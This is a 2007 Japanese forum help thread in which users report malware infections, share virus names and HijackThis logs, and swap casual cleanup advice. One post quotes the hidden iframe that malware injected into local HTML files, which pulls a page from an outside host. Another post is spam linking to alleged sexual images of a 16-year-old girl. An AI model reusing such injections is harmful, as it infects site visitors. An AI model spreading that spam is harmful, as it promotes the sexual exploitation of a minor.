中国ウイルスはしつこいですよね。
ウイルス名だけでも解りませんか?
127中国:2007/07/01(日) 10:15:23 ID:???
複合感染を起こしています。

virus Worm.Win32.Viking.ls
Trojan program Trojan-PSW.Win32.OnLineGames.sl
Trojan program Trojan-Proxy.Win32.Small.du c:\program files\internet explorer\svchost.exe 24 KB
Trojan program Trojan-PSW.Win32.Nilage.bjp c:\windows\system32\nwizqjsj.dll 16.5 KB
その他もあります。

あらゆる実行ファイルに感染を起こし、さらに変なdllも多く、怪しいサービスも追加されていました。
128中国:2007/07/01(日) 10:17:43 ID:???
とりあえず、ホストファイルの書き換えでしのいでいますが、
何かの拍子に、勝手にIEが起動し再感染したがっています。
1294 ◆NFQtmGW3bw :2007/07/01(日) 10:23:49 ID:???
>>128
もしかしたら、当方では解決できないかもしれません。
とりあえずHijack Thisのログをお願いします。
130中国:2007/07/01(日) 11:32:01 ID:???
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 11:29:05, on 2007/07/01
Platform: Windows XP SP1 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AOL\Active Virus Shield\avp.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\Program Files\SoftEther VPN Client 2.0\vpnclient.exe
C:\Program Files\SoftEther VPN Server 2.0\vpnserver.exe
C:\WINDOWS\System32\conime.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\NEC\SmartVision\SvSche.exe
C:\Program Files\AOL\Active Virus Shield\avp.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\MagicTune Premium\GammaTray.exe
C:\Program Files\NECTVRC\TVRC.EXE
C:\Documents and Settings\P4\デスクトップ\UntiYAlt104\UntiYAlt.exe
D:\ASUS P4\tool\ネットワーク関連\Nemu1531\CheckSrv.exe
C:\WINDOWS\System32\taskmgr.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\ASUS P4\tool\utatane0253\Utatane.exe
C:\Documents and Settings\P4\デスクトップ\live2ch105\live2ch.exe
C:\Program Files\TTP_V10\TranMnTe_p.exe
C:\Program Files\TTP_V10\TranMnTe_cnp.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\P4\デスクトップ\HiJackThis_v2\HiJackThis_v2.exe

131中国:2007/07/01(日) 11:33:28 ID:???
R3 - URLSearchHook: NemuSearchHook Class - {D8E65B35-D24B-4A59-AD50-32AB5E55A9DA} - D:\ASUS P4\tool\ネットワーク関連\Nemu1531\NemuBar.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: NTIECatcher Class - {C56CB6B0-0D96-11D6-8C65-B2868B609932} - C:\Program Files\Xi\NetTransport 2\NTIEHelper.dll
O3 - Toolbar: NemuBar - {15F32ED9-C897-4B56-A560-4FD731816B1E} - D:\ASUS P4\tool\ネットワーク関連\Nemu1531\NemuBar.dll (file missing)
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: The翻訳プロフェッショナル V10.0 - {7221EBE3-9A33-4866-A5F8-A5EEC21B25DA} - C:\Program Files\TTP_V10\def_bar.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [aol] "C:\Program Files\AOL\Active Virus Shield\avp.exe"
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [ctfmon.exe] ctfmon.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [ctfmon.exe] ctfmon.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] ctfmon.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] ctfmon.exe (User 'Default user')
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
132中国:2007/07/01(日) 11:34:51 ID:???
O8 - Extra context menu item: Net Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddLink.html
O8 - Extra context menu item: The翻訳_ページ翻訳 - C:\Program Files\TTP_V10\addins\Ie\afi_pagetran.htm
O8 - Extra context menu item: The翻訳_範囲指定翻訳 - C:\Program Files\TTP_V10\addins\Ie\afi_seltran.htm
O8 - Extra context menu item: The翻訳_翻訳設定 - C:\Program Files\TTP_V10\addins\Ie\afi_setdlg.htm
O8 - Extra context menu item: The翻訳_辞書参照 - C:\Program Files\TTP_V10\addins\Ie\ttp_showdic.htm
O8 - Extra context menu item: ページ内のFlashムービーを抽出 - C:\PROGRA~1\FLASHP~1\XTR.HTM
O8 - Extra context menu item: 全てをNet Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddList.html
O9 - Extra button: NemuBar - {15F32ED9-C897-4B56-A560-4FD731816B1E} - D:\ASUS P4\tool\ネットワーク関連\Nemu1531\NemuBar.dll (file missing)
O9 - Extra 'Tools' menuitem: NemuBar - {15F32ED9-C897-4B56-A560-4FD731816B1E} - D:\ASUS P4\tool\ネットワーク関連\Nemu1531\NemuBar.dll (file missing)
O9 - Extra button: ページ翻訳 - {CCCAD8D1-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\afi_pagetran.htm
O9 - Extra 'Tools' menuitem: The翻訳_ページ翻訳 - {CCCAD8D1-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\afi_pagetran.htm
O9 - Extra button: (no name) - {CCCAD8D7-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\ttp_showdic.htm
O9 - Extra 'Tools' menuitem: The翻訳_辞書参照 - {CCCAD8D7-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\ttp_showdic.htm
O9 - Extra button: (no name) - {CCCAD8D8-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\afi_seltran.htm
O9 - Extra 'Tools' menuitem: The翻訳_範囲指定翻訳 - {CCCAD8D8-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\afi_seltran.htm
O9 - Extra button: (no name) - {CCCAD8DA-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\afi_setdlg.htm
O9 - Extra 'Tools' menuitem: The翻訳_翻訳設定 - {CCCAD8DA-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\addins\Ie\afi_setdlg.htm
O9 - Extra button: 辞書バー - {CCCAD8DC-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\IeTbandTate.dll
O9 - Extra button: 翻訳バー - {CCCAD8DE-E927-4131-A1A7-E550BFCD3548} - C:\Program Files\TTP_V10\IeTbandYoko.dll
133中国:2007/07/01(日) 11:37:08 ID:???
O16 - DPF: {05664D4A-60B9-4C04-929B-5F0098D38218} (veCamit for Setting Control) - http://ecamit.3jtech.com.tw/veCamitX.cab
O16 - DPF: {0A5FD7C5-A45C-49FC-ADB5-9952547D5715} (Creative Software AutoUpdate) - http://www.creative.com/su/ocx/15009/CTSUEng.cab
O16 - DPF: {0D41B8C5-2599-4893-8183-00195EC8D5F9} (asusTek_sysctrl Class) - http://support.asus.com/common/asusTek_sys_ctrl.cab
O16 - DPF: {0E8D0700-75DF-11D3-8B4A-0008C7450C4A} (DjVuCtl Class) - http://downloadcenter.samsung.com/content/common/cab/DjVuControlLite_EN.cab
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.co.jp/virusscanner-just/kavwebscan_unicode.cab
134中国:2007/07/01(日) 11:38:01 ID:???
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {1C3DE665-D259-4C72-9D7D-C51FCB4CCFB9} (Panasonic Network Camera) - http://hy2-m.miemasu.net/SysCamInst.cab
O16 - DPF: {215D1500-1B32-46B0-A9FF-A09B47D256D1} (E3FormX Control) - http://corp.s-onetelecom.com/truehome/activex/v1/E3ActiveX2.cab
O16 - DPF: {2882C368-D508-11D4-A2AB-000102598CE4} (LProtect Control) - http://download.hauri.net/Jpn/on-line/livecall.cab
O16 - DPF: {2FB29B6E-8A10-4B66-A609-6032DFEB31A6} (MXChatCtrl Control) - http://2sen.dip.jp/2sen/MXCCtrl.cab
O16 - DPF: {361E6B79-4A69-4376-B0F2-3D1EBEE9D7E2} (RtspVaPgCtrl Class) - http://221.115.88.51/RtspVaPgDec.cab
135中国:2007/07/01(日) 11:39:09 ID:???
O16 - DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} (Windows Live Safety Center Base Module) - http://scan.safety.live.com/resource/download/scanner/wlscbase969.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1120223926087
O16 - DPF: {644B05F6-5947-11D4-87D2-0000C0C881E7} (PanelX コントロール) - http://202.214.71.200/activex/jpegactInf.cab
O16 - DPF: {745395C8-D0E1-4227-8586-624CA9A10A8D} - http://219.117.194.183:211/activex/AMC.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2005111401/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {87BE3784-6977-4E84-AA08-55A96B9CEAC5} (Bl_camera Control) - http://ybbvinculum.dyndns.org:81/bl_camera.cab
O16 - DPF: {8D055D88-9D00-4EEB-89EA-4E7301F7C25E} (QUICK Streamer ActiveX Control(C25E)) - http://ot2.qweb.ne.jp/qs_common/cab10038/QecClntX.cab
O16 - DPF: {93E776BB-E4E9-44A1-829B-6EBC3A6804A2} (E3FormX Control) - http://corp.s-onetelecom.com/truehome/activex/v1/E3ActiveX3.cab
136中国:2007/07/01(日) 11:40:27 ID:???
O16 - DPF: {A93B47FD-9BF6-4DA8-97FC-9270B9D64A6C} (VaPgCtrl Class) - http://43.234.59.252:8080/plugin/h263ctrl.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {DD3648A8-2E16-42AE-9F65-289851F9E8C6} (fslead Class) - http://flets-square-guide.com/axfcctrl/script/axfslead.cab
O16 - DPF: {DE625294-70E6-45ED-B895-CFFA13AEB044} (AxisMediaControlEmb Class) - http://219.117.194.183:210/activex/AMC.cab
O16 - DPF: {EAB73ECD-73E2-11D4-A6ED-006097BFA1AC} (A.I.Soft PC on-line diagnosis data-sender component class) - http://pc.ai2you.com/PCshindanshi/prg/clncheck.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://www.creative.com/su/ocx/15010/CTPID.cab
O16 - DPF: {FE5E2BC4-B480-4788-AF1E-F9CD37034F49} (VeCamit for ADT Control) - http://ecamit.3jtech.com.tw/veCamitX.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{09D9FB76-0B50-48ED-B9D1-EA0F8A9750BB}: NameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{AF77737B-1A3D-4C09-BFE7-44525A2474D1}: NameServer = 192.168.11.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{09D9FB76-0B50-48ED-B9D1-EA0F8A9750BB}: NameServer = 192.168.1.1
O17 - HKLM\System\CS2\Services\Tcpip\..\{09D9FB76-0B50-48ED-B9D1-EA0F8A9750BB}: NameServer = 192.168.1.1
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dll
O23 - Service: ASP.NET State Service (aspnet_state) - Unknown owner - C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe (file missing)
O23 - Service: Active Virus Shield (AVP) - AOL - C:\Program Files\AOL\Active Virus Shield\avp.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
O23 - Service: SoftEther VPN Client 2.0 (vpnclient) - SoftEther Corporation - C:\Program Files\SoftEther VPN Client 2.0\vpnclient.exe
O23 - Service: SoftEther VPN Server 2.0 (vpnserver) - SoftEther Corporation - C:\Program Files\SoftEther VPN Server 2.0\vpnserver.exe

--
End of file - 10993 bytes
137中国:2007/07/01(日) 11:45:45 ID:???
なんだか、あらしみたいな書き込みになってしまいましたが。
どんなシステムだか丸見えですね
何か不審なところがあるでしょうか?
138中国:2007/07/01(日) 12:55:07 ID:???
全部消したはずなのに、また検出され始めました。

C:\WINDOWS\uninstall\rundl132.exe
C:\WINDOWS\SYSTEM32\LYLOADER.EXE

一体どこから入ってくるのでしょう。
139中国:2007/07/01(日) 13:04:19 ID:???
nwizqjsj.exe
LYLOADMR.EXE
140中国:2007/07/01(日) 13:07:13 ID:???
detected: virus Worm.Win32.Viking.lu File: C:\WINDOWS\RichDll.dll/UPack/PE_Patch
detected: virus Worm.Win32.Viking.lu File: C:\WINDOWS\sys170.exe
1414 ◆NFQtmGW3bw :2007/07/01(日) 15:01:39 ID:???
>>中国さん
一回インターネットの回線を切断したほうがいいと思います。
書き込みなどは、セーフモード(インターネット)とか、別のPCでやったほうがいいかもしれません。
1424 ◆NFQtmGW3bw :2007/07/01(日) 15:03:03 ID:???
それか思い切って
http://bbs.higaitaisaku.com/cbbs.cgi
に投稿したほうがいいかもしれません。
正直かなりひどい状態になっています。
自分では申し訳ないですが、対処できません。すいません。
143まちがって名前消しちゃいました。:2007/07/01(日) 15:43:32 ID:???
中国、恐るべし・・・
144中国:2007/07/01(日) 17:54:02 ID:???
4番さん、ご返答ありがとうございます。

やはり重症でしたか、、、、
ファイル名でぐぐっても中国語サイトばっかり。。。

とりあえず、カスペルスキーにどうにかしろや!めーる送ってみました。
今のところ返信なし。。

日本で感染者俺だけ??w
145中国:2007/07/01(日) 17:58:48 ID:???
>>143
俺は怖くないよw
146まちがって名前消しちゃいました。:2007/07/01(日) 18:03:52 ID:???
>>145
すまんオマイじゃなくて中国ウイルスの事だ

改めて、中国ウイルス恐るべし!
147まちがって名前消しちゃいました。:2007/07/01(日) 18:16:40 ID:sIPsroZI
ついさっきウイルス検索終わって
TSPY_VB.DVJって言うのが出てきました。
ネットで検索しても全く情報がないのですが・・・
クレジットカードの番号や銀行口座等情報が漏れてないか心配です・・・
ウイルスは外付けHDの
H:\System Volume Information\_restore{1ABE9C81-18A9-4095-A416-7D8F3868A6BF}\RP386
にありました。
ファイル名はA0072113.exe
情報がまったくないんでどのレジストリを削除したら良いかも分からなくて困っています。
ただ、TSPY_VB.CRRで作成されるHKEY_CURRENT_USER\SOFTWARE\Gはありました
どなたか宜しくお願いしますm(_ _)m
148147:2007/07/01(日) 18:21:29 ID:sIPsroZI
書き忘れてました
WinXP pro
ソフトはNTT西日本のセキュリティ対策ツール(トレンドマイクロ)
149中国:2007/07/01(日) 20:15:43 ID:???
ローカルのHTMLファイルもすべて書き換えられてることが判明。




<iframe src=http://www.puma166.com/1.htm width=0 height=0></iframe>

末尾に上のような表記が追加されてるようです。

中国ウイルス恐るべし! ていうか、ウイルス除去屋、もっとしっかりしろ。。
150中国:2007/07/01(日) 20:16:45 ID:???
手作業で消すのもめんどいし、、何か良いアイデアorつーるないでしょうか?
1514 ◆NFQtmGW3bw :2007/07/01(日) 20:41:44 ID:???
>>150
いや、これ本当以前の俺と同じ症状だわwww
消しても消しても復活するのが中国系ウイルスなんだよねwww
私の場合はクリーンインストールして、データ全部消して、OS入れなおしたけど、
アダ被で聞いたらもしかしたら何とかなるかもしれません。
1524 ◆NFQtmGW3bw :2007/07/01(日) 20:43:46 ID:???
>>147
どうやら最近見つかったウイルスのようです。
トレンドマイクロのウイルス駆除ソフトで消せると思います。
153まちがって名前消しちゃいました。:2007/07/01(日) 21:42:21 ID:???
windows XP
ウイルスバスター2007(プロバイダ月額版)

先ほど検索が終わって見た所ウイルスのカテゴリに3つ引っかかっておりました。
1つは隔離済みと出ていたのですが2つは「隔離できません」と出ており画面を閉じてしまってしまったので再度検索中なのですが
2つともPAK_GENERICというタイプでした、「Hup.dll」「succubus.dll」というの感じのを覚えております。
トレンドマイクロにて調べましたが対処法などはまだ書かれていなかったのですが皆さんのお知恵をお借りしたく書き込みました。
格納場所は確かC>Documents and Settings>ユーザー名>localだったと思われるのですがそのようなファイルは無かったです。
154153:2007/07/01(日) 21:46:38 ID:???
訂正があります。
×PAK_GENERIC
○PAK_Generic.001
155まちがって名前消しちゃいました。:2007/07/02(月) 18:54:33 ID:???
昨日MSNのメッセンジャーの友達からメッセージが着たんです

そこにはclick here! あとURLが。それをクリックして実行したんです。

今日聞いてみるとそれはウイルスだったらしく

メッセの友達に自動でそのメッセージを送るというものです。他は分からないけど

avastを使用してるんですが反応がありませんでした。駆除したいんですがどうしたら良いですか?
156まちがって名前消しちゃいました。:2007/07/02(月) 20:47:01 ID:???
何だか、この前2chのあるスレを開いたら、いきなりプツッて切れてしまいました。
(その時原因不明のピーって音が。イヤホンしてたのに他の人に聞こえてました)
でも電源が切れたわけではなく、画面が真っ暗に。
その後電源切ってまたやり直したんですけど、何分後かにまたプツッと。
段段、時間が短くなっていって、起動ボタンを押しても起動しなくなってしまいました。。
今、できてるんですが、やっぱり何分後かに。
セーフモードでも駄目でしたぁ。。これってPC古いだけなのかなぁ?
157まちがって名前消しちゃいました。:2007/07/03(火) 13:00:53 ID:???
スレ違いかもわかりませんがomanchinと言うサイトを踏んでしまいました
どうすればいいでしょうか?
158まちがって名前消しちゃいました。:2007/07/09(月) 11:06:01 ID:???
onligaui.exe
↑こんなのがうちの会社の中国人社員のPCに入っていた。
中国語の.NETのTipsサイト見てたら入ったらしい。

ググっても中国語ページしか出てこないから分からん。


とりあえず症状とうちで取った対処
----------------------------------------------------

症状:本体と同じフォルダにあるconfigファイルに記載された
秒数の間隔でInternetExplorerをポップアップ

対処:レジストリから削除
1594 ◆NFQtmGW3bw :2007/07/09(月) 20:29:01 ID:i9h7sC2P
>>158
症状は治まりましたか?
160まちがって名前消しちゃいました。:2007/07/10(火) 12:31:16 ID:???
>>159
おさまりました
1614 ◆NFQtmGW3bw :2007/07/10(火) 16:52:47 ID:OYaaSerI
>>160
ならいいですが、不安でしたらアダ被の掲示板で質問してみるといいでしょう。
中国系ウイルスは自分ではどうにもならないwww
162中国:2007/07/11(水) 21:34:31 ID:???
>>161
見捨てないでw

スキルアップよろ!
1634 ◆NFQtmGW3bw :2007/07/12(木) 15:24:40 ID:Dq2MDWZQ
>>162
じゃあもうちょっと頑張ってみましょうか
164書き込みブラウザ:2007/07/12(木) 19:22:34 ID:IfNgaEeG
コンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしいコンピューター死ぬらしい
1654 ◆NFQtmGW3bw :2007/07/12(木) 21:48:36 ID:V6kGsK8A
>>164
狂った書き込みを左に受け流す!
166まちがって名前消しちゃいました。:2007/07/13(金) 13:18:35 ID:Jus+VusF
>>165
うまい!
1674 ◆NFQtmGW3bw :2007/07/13(金) 18:28:38 ID:v94YAf5k
中国もう少し粘ってみます。
168まちがって名前消しちゃいました。:2007/07/13(金) 21:50:33 ID:EgAzoW9+
質問いいでしょうか。トロイの木馬って恐ろしい事に遠隔操作ができるらしいですね。
backdoor.win32が検知されたので削除すれば、とりあえずは安心してよいのでしょうか?
幸か不幸かいわゆるアドレスや口座番号のメモはしてなかったです。
169まちがって名前消しちゃいました。:2007/07/13(金) 23:17:06 ID:DsDz2enL
誰か助けてください。。

真っ黒な画面で真ん中に白いドクロが表示されて何も出来ないんです…
170170:2007/07/14(土) 00:56:06 ID:4hFsCTjX
文字化けします窓を小さくするところが2とか数字になってます
どうやったらなおりますか?
1714 ◆NFQtmGW3bw :2007/07/14(土) 07:36:39 ID:???
>>168
オンラインスキャンしてみてください。
>>169
ドクロウイルスに感染したのか?P2Pなんてやってるからだよ。
削除の仕方はわからないな。
>>170
多分フォントキャッシュが壊れているのでセーフモードで立ち上げて再起動してみてください。
172まちがって名前消しちゃいました。:2007/07/14(土) 20:20:54 ID:3Jr15OZM
エロスレを見ていたら ドラキュラが出て来て勝手にダウンロードを開始
パソコンの電源を切って 再起動したが やはりダウンロード開始
一体コレって何? 誰か知っている人いる?
173まちがって名前消しちゃいました。:2007/07/14(土) 21:05:31 ID:wnTwqfap
カスペルスキーでオンラインスキャナをしていたところ、以下のウイルスを
検知しました。バスターでは無反応だったので戸惑っています。削除方法や
危険度わかる方がいたらお願いします。お世話かけます。
感染したオブジェクト×3  検知したウイルス×1
感染したオブジェクト名
C:\System Volume Information\_restore{3F337EE0-D1BE-492D-ABE2-F7A0954FE46A}\RP131\A0029678.exe/data.rar/wr.exe
C:\System Volume Information\_restore{3F337EE0-D1BE-492D-ABE2-F7A0954FE46A}\RP131\A0029678.exe/data.rar
C:\System Volume Information\_restore{3F337EE0-D1BE-492D-ABE2-F7A0954FE46A}\RP131\A0029678.exe

ウイルス名
Trojan-Downloader.Win32.Small.eqn
174まちがって名前消しちゃいました。:2007/07/15(日) 05:36:44 ID:5pHyNC7V
>>173
トロイ系はレジストリ改変するのが多いから削除しても被害が残る場合が多いです
OS再インストールが一番安全かと

ちなみに
>Trojan-Downloaderそのものは、情報漏洩や悪質な広告表示など他の機能を持つマルウェアを
>パソコン内にダウンロードしてくる役割をするものです。
>これが今現在も動いているとしたらえらいことですが…

1754 ◆NFQtmGW3bw :2007/07/15(日) 06:54:26 ID:???
>>172
ドラキュラってなんですかね?
ちょっとよく意味がわかりません。
ドラキュラが出てきてというのはどういうことでしょうか?
176中国:2007/07/15(日) 12:06:14 ID:???
>>173
バスターは信用できんよ。
1774 ◆NFQtmGW3bw :2007/07/15(日) 13:11:56 ID:???
>>173
すいません、見逃してました。
確かに中国さんの言うとおり、バスターは最悪です。
パソコンは重くなるし、誤検出もあるし。
他のところでもオンラインスキャンしてみてはどうでしょうか?
178173:2007/07/15(日) 21:33:08 ID:oNyOI+3D
>>174 >>176 >>177
みなさんお騒がせしました。バスターでの検知及び駆除は
あきらめて、再セットアップしました。
購入当時のPCに戻りサクサク動いています。くせになりそうです。
179まちがって名前消しちゃいました。:2007/07/15(日) 22:55:31 ID:A8xxd53i
インターネットに接続したら変な外国の広告が出てくるし
フリーズばっかりだし
iPod買ったんだがパソコンがフリーズして未だ一曲も入れれない・・・・。
かなりのパソコン初心者で自分で直すの無理だから修理窓口に電話してみようかな・・・・・
大体いくらぐらいかかりますか?
1804 ◆NFQtmGW3bw :2007/07/16(月) 09:02:39 ID:???
>>178
よかったですね。今度はセキュリティを高めて感染しないように心がけましょう

>>179
場合によるけど多分データは全部消えるよ。修理に出す前にバックアップとってな。
どのくらい掛かるかはわからない。
181まちがって名前消しちゃいました。:2007/07/16(月) 20:17:58 ID:R8Z/UATn
182まちがって名前消しちゃいました。:2007/07/17(火) 21:50:40 ID:34Vxxnuz
昨日avast!が突然なんの脈絡もなくトロイの警告を出してきた。
隔離できないので削除したんだけどしつこく何度も復活してくる。
5〜6回削除したころ復活しなくなったのでそのまま使ってシャットダウンしたんだけど
今日立ち上げたら読み込みの途中でブルースクリーンになって
c000021a unknown errorが出て立ち上がらなくなってしまった。
偶然にもFDDドライブまで逝ってしまって手間取ったがバックアップしておいた
マイリカバリデスクで今復帰したがこれが噂の中国産のトロイか。
中国の怪しいサイトにいくつか行った覚えはあるがだいぶ前だし昨日はそれらしいこと
してないので今まで潜伏してたわけかな。
183まちがって名前消しちゃいました。:2007/07/18(水) 04:49:37 ID:o+glg1Mp
KINGSOFTでウィルススキャンしたら、発見したウィルスが
4000件超えた\(^o^)/
184まちがって名前消しちゃいました。:2007/07/18(水) 09:23:11 ID:???
女の子と話せません
ウイルスでしょうか?
185まちがって名前消しちゃいました。:2007/07/18(水) 10:16:22 ID:F9tZIuSf
>>182
avastなんて使わずにAVS使えばいいのに…
186まちがって名前消しちゃいました。:2007/07/18(水) 10:55:07 ID:lqwEqO/0
学校サボった女子高生が制服姿のまま
まんまんや尻の穴をうpして大ハシャギ中
いよいよ高校名も特定完了?

【16♀】うpして見られるのがクセになってきた【露出狂?】
http://wwwww.2ch.net/test/read.cgi/news4vip/1184722969/
187まちがって名前消しちゃいました。:2007/07/18(水) 12:51:26 ID:???
ウイルスバスター2006のリアルタイム検索でウイルスが見つかって
手動で〜って何回も出てたのですが、
2007にアップグレードしたら表示されなくなりました。
これは、駆除or隔離できたと思っていいのでしょうか?
すみません、教えてください
188中国:2007/07/19(木) 00:42:15 ID:???
>>187
とりあえず、カスペルと、ノートンのオンラインスキャンでチェック。
189まちがって名前消しちゃいました。:2007/07/19(木) 02:37:06 ID:YZb4cTeN
ウイルスに感染してしまい歌等を保存していた外付けHDの中のフォルダのアイコンが表示されなくなりました(>_<)助けてください(>_<)
190まちがって名前消しちゃいました。:2007/07/20(金) 23:53:52 ID:HGnDmOk8
191まちがって名前消しちゃいました。:2007/07/21(土) 02:13:07 ID:oSxYiRw5
携帯から失礼します。
先程、トロイの木馬に感染してしまいました。
パソコンは、家電でしかない自分にとって、全く知識はありません。
マカフィーに、今ウイルススキャンさせてますが
正直、何をどうしたらいいかわかりません。
パソコンの無い生活に戻るしかないですか?
192まちがって名前消しちゃいました。:2007/07/21(土) 07:01:34 ID:???
>>191
仕方がない。

リカバリーすること。

データは全て無くなるけど、ウイルスも無くなるよ!
1934 ◆NFQtmGW3bw :2007/07/21(土) 09:09:00 ID:???
>>191
パソコンは動かなくなったのですか?
194187:2007/07/21(土) 11:52:34 ID:???
>>188
オンラインスキャンでウィルスは見つからなかったです。
これって…大丈夫ってことですよ…ね?
1954 ◆NFQtmGW3bw :2007/07/21(土) 12:23:47 ID:???
>>194
多分大丈夫だと思います。
不安でしたらHijack Thisのログをお願いします。
196まちがって名前消しちゃいました。:2007/07/21(土) 14:17:50 ID:oSxYiRw5
>>191 ですが、パソコンの初期設定は業者にやってもらいました。
初期設定のデータは保存してませんでしたし、リカバリーと言われてもやり方がわかりません。

マカフィーから
「トロイの木馬に感染しました。自動消去出来ませんでした。」 とメッセージがでました。
その後で、遠隔と言うのをやるとウイルスか消えましたが、このスレをロムって見ると、どうもそんなに簡単なものでもないとわかり、不安になりました。
週に何度かパソコンを使う程度の者には、とても難しい問題です。
リカバリーが必要なら、必死こいて説明書を読んでリカバリーしますが、時間があまりないし。
消えたとは言え、このままではまずいですかね?
197まちがって名前消しちゃいました。:2007/07/21(土) 14:46:09 ID:Fwmumq8H
携帯から失礼します。
私もそのドクロウィルスとやらに感染してしまったんですが直し方はないのでしょうか?
198まちがって名前消しちゃいました。:2007/07/22(日) 09:53:51 ID:T43XcAId
>>197
ドクロは自業自得です。解決方法はありません
1994 ◆NFQtmGW3bw :2007/07/22(日) 10:19:08 ID:???
>>196
ウイルスは消えたんですね。
簡単に消せるものなら大丈夫です。
消せないものに感染した場合はリカバリ必須となります。
貴方の場合は大丈夫だと思いますよ。

>>197
ドクロはP2Pやるから入るんだよ。
やらないようにしようよ。
